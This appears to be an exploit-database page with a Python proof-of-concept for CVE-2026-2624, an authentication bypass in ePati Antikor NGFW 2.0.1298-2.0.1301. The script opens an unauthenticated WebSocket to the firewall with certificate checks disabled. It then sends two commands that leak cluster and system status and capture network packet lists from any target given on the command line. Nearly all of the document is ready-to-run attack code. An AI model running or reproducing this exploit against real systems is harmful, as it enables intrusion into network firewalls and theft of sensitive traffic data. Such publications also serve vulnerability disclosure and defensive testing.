Share
## https://sploitus.com/exploit?id=PACKETSTORM:221081
# Exploit Title: ePati Antikor NGFW 2.0.1301 -  Authentication Bypass 
    # Date: 2026-04-13
    # Exploit Author: [SADIK ERTÜRK]
    # Vendor Homepage: https://www.epati.com.tr/
    # Software Link: https://www.epati.com.tr/antikor-ngfw/
    # Version: v.2.0.1298 - v.2.0.1301
    # Tested on: Linux / Antikor OS
    # CVE: CVE-2026-2624
    
    import websocket
    import json
    import ssl
    import sys
    import argparse
    import random
    import string
    import time
    
    def banner():
        print("-" * 65)
        print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
        print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
        print("-" * 65)
    
    def generate_random_id(length=8):
        """Generates a random session ID for the SockJS connection."""
        return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
    
    def exploit(target_ip, target_port):
        # Generating random server and session IDs for SockJS
        server_id = random.randint(100, 999)
        session_id = generate_random_id()
        
        ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
        print(f"[*] Target WebSocket URL created: {ws_url}")
        print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")
    
        try:
            # Bypassing Self-Signed SSL certificate verifications
            ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
            ws.connect(ws_url)
            print("[+] Connection Successful! (Authentication bypassed)\n")
            
            # Payload 1: Listening to Cluster and System Status
            payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
            print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
            ws.send(payload_1)
    
            # Wait for the response from the server
            time.sleep(1) 
            response_1 = ws.recv()
            
            if response_1:
                print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
                print(f"> {response_1}\n")
            
            # Payload 2: Listening to Network Packets
            payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
            print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
            ws.send(payload_2)
            
            time.sleep(1)
            response_2 = ws.recv()
            
            if response_2:
                print("[+] Network packet data captured:")
                print(f"> {response_2}\n")
    
            print("[*] Exploitation complete. Closing connection.")
            ws.close()
    
        except websocket.WebSocketException as e:
            print(f"[-] WebSocket Error: {e}")
            print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
            sys.exit(1)
        except Exception as e:
            print(f"[-] An unexpected error occurred: {e}")
            sys.exit(1)
    
    if __name__ == "__main__":
        banner()
        
        # Argument parsing
        parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
        parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
        parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")
        
        args = parser.parse_args()
        
        exploit(args.target, args.port)